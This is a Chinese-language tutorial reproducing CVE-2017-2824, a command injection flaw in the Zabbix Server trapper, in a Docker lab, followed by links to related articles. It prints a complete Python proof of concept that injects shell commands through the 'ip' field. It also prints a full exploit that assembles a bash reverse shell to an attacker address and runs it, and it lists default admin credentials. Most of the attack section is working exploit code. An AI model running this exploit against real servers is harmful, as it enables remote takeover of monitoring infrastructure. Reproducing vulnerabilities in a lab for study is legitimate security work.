Zabbix Server trapper 命令注入漏洞 (CVE-2017-2824)

简介: Zabbix Server trapper 命令注入漏洞,攻击者可通过特定Payload获取服务器执行权限。

声明


请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。


一、漏洞简介


Zabbix 是由Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。其Server端 trapper command 功能存在一处代码执行漏洞,特定的数据包可造成命令注入,进而远程执行代码。攻击者可以从一个Zabbix proxy发起请求,从而触发漏洞。

二、影响范围


  • Zabbix Server 2.4.X 版本


三、环境搭建


Vulfocus:docker pull vulfocus/zabbix-cve_2017_2824:latest

image.png

查看本地镜像并运行漏洞环境


docker images

docker run -d -P vulfocus/zabbix-cve_2017_2824

-d:将镜像挂起后台运行

-P:将镜像需要开启的端口随机映射到这台服务器的公网IP端口上

image.png

image.png

访问ip:port成功搭建,使用默认管理员账号密码进入后台


用户名:admin

密码:Zabbix

image.png

接着 在Configuration的选项卡里进入Actions下把Event source选中Auto registration,点击Create action,以管理员的身份去开启自动注册功能

image.png

image.png

image.png

操作完成之后就开启了自动注册功能。

image.png

四、本地实战


POC测试

利用链接:https://github.com/listenquiet/cve-2017-2824-reverse-shell

import sys

import socket

import json

import sys

def send(ip, data):

   conn = socket.create_connection((ip, 10051), 10)

   conn.send(json.dumps(data).encode())

   data = conn.recv(2048)

   conn.close()

   return data

target = sys.argv[1]

print(send(target, {"request":"active checks","host":"vulhub","ip":";touch /tmp/success"}))

for i in range(10000, 10500):

   data = send(target, {"request":"command","scriptid":1,"hostid":str(i)})

   if data and b'failed' not in data:

       print('hostid: %d' % i)

       print(data)

image.png

使用 ls /tmp命令查看是否执行成功

image.png

反弹Shell

Exp如下:

import sys

import socket

import json

from time import sleep

def send(ip, data):

   conn = socket.create_connection((ip, 10051), 10)

   conn.send(json.dumps(data).encode())

   data = conn.recv(2048)

   conn.close()

   return data

# target = "X.X.X.X"

target = sys.argv[1]

num = 1

exps = [';echo -n "/bin/bash" > /tmp/1.sh', ';echo -n " -i >& " >> /tmp/1.sh', ';echo -n "/dev/tcp/" >> /tmp/1.sh',

       ';echo -n "X.X." >> /tmp/1.sh', ';echo -n "X.X/" >> /tmp/1.sh', ';echo -n "1234 0>&1" >> /tmp/1.sh',

       ';/bin/bash /tmp/1.sh']

for exp in exps:

   host = "vulhub" + str(num)

   print(host)

   print(send(target, {"request": "active checks", "host": host, "ip": exp}))

   sleep(1)

   num += 1

   for i in range(10000, 10500):

       data = send(target, {"request": "command", "scriptid": 1, "hostid": str(i)})

       if data and b'failed' not in data:

           print('hostid: %d' % i)

           print(data)

image.png

执行:python3 exp.py X.X.X.X

image.png

可以看到已经反弹Shell

image.png

攻击完成!!!

目录
相关文章
|
存储 监控 安全
Zabbix登录绕过漏洞复现(CVE-2022-23131)
最近在复现zabbix的漏洞(CVE-2022-23131),偶然间拿到了国外某公司zabbix服务器。Zabbix Sia Zabbix是拉脱维亚Zabbix SIA(Zabbix Sia)公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。Zabbix Frontend 存在安全漏洞,该漏洞源于在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。 未经身份验证的恶意攻击者可能会利用此问题来提升权限并获得对 Zabbix 前端的管理员访问权限。
1807 0
Zabbix登录绕过漏洞复现(CVE-2022-23131)
|
6月前
|
监控 数据库连接 数据安全/隐私保护
安装Zabbix Server
安装Zabbix Server
92 1
|
运维 监控
【运维知识进阶篇】Zabbix5.0稳定版详解10(Zabbix自动注册+Ansible自动部署,实现一条命令监控任意主机)
【运维知识进阶篇】Zabbix5.0稳定版详解10(Zabbix自动注册+Ansible自动部署,实现一条命令监控任意主机)
170 0
|
监控 Linux
CentOS手把手教你搭建Zabbix Server,Zabbix Proxy,Zabbix Agent企业级监控平台(三)
CentOS手把手教你搭建Zabbix Server,Zabbix Proxy,Zabbix Agent企业级监控平台
216 0
 CentOS手把手教你搭建Zabbix Server,Zabbix Proxy,Zabbix Agent企业级监控平台(三)
|
监控 前端开发 Linux
CentOS手把手教你搭建Zabbix Server,Zabbix Proxy,Zabbix Agent企业级监控平台(二)
CentOS手把手教你搭建Zabbix Server,Zabbix Proxy,Zabbix Agent企业级监控平台
142 0
CentOS手把手教你搭建Zabbix Server,Zabbix Proxy,Zabbix Agent企业级监控平台(二)
|
运维 自然语言处理 监控
CentOS手把手教你搭建Zabbix Server,Zabbix Proxy,Zabbix Agent企业级监控平台(一)
CentOS手把手教你搭建Zabbix Server,Zabbix Proxy,Zabbix Agent企业级监控平台
199 0
CentOS手把手教你搭建Zabbix Server,Zabbix Proxy,Zabbix Agent企业级监控平台(一)
|
监控 Linux
手把手教你CentOS下搭建Zabbix Server,Zabbix Proxy,Zabbix Agent企业级监控平台(三)
手把手教你CentOS下搭建Zabbix Server,Zabbix Proxy,Zabbix Agent企业级监控平台
131 0
手把手教你CentOS下搭建Zabbix Server,Zabbix Proxy,Zabbix Agent企业级监控平台(三)
|
监控 前端开发 Linux
手把手教你CentOS下搭建Zabbix Server,Zabbix Proxy,Zabbix Agent企业级监控平台(二)
手把手教你CentOS下搭建Zabbix Server,Zabbix Proxy,Zabbix Agent企业级监控平台
191 0
手把手教你CentOS下搭建Zabbix Server,Zabbix Proxy,Zabbix Agent企业级监控平台(二)
|
运维 自然语言处理 监控
手把手教你CentOS下搭建Zabbix Server,Zabbix Proxy,Zabbix Agent企业级监控平台(一)
手把手教你CentOS下搭建Zabbix Server,Zabbix Proxy,Zabbix Agent企业级监控平台
672 0
手把手教你CentOS下搭建Zabbix Server,Zabbix Proxy,Zabbix Agent企业级监控平台(一)
|
存储 监控 安全
zabbix最新漏洞,可绕过认证登陆!
Zabbix对客户端提交的`Cookie`会话存在不安全的存储方式,导致在启动`SAML SSO`认证模式的前提下,恶意用户可通过构造特殊请求绕过认证,获取管理员权限,进而可实现`RCE`。
665 0
zabbix最新漏洞,可绕过认证登陆!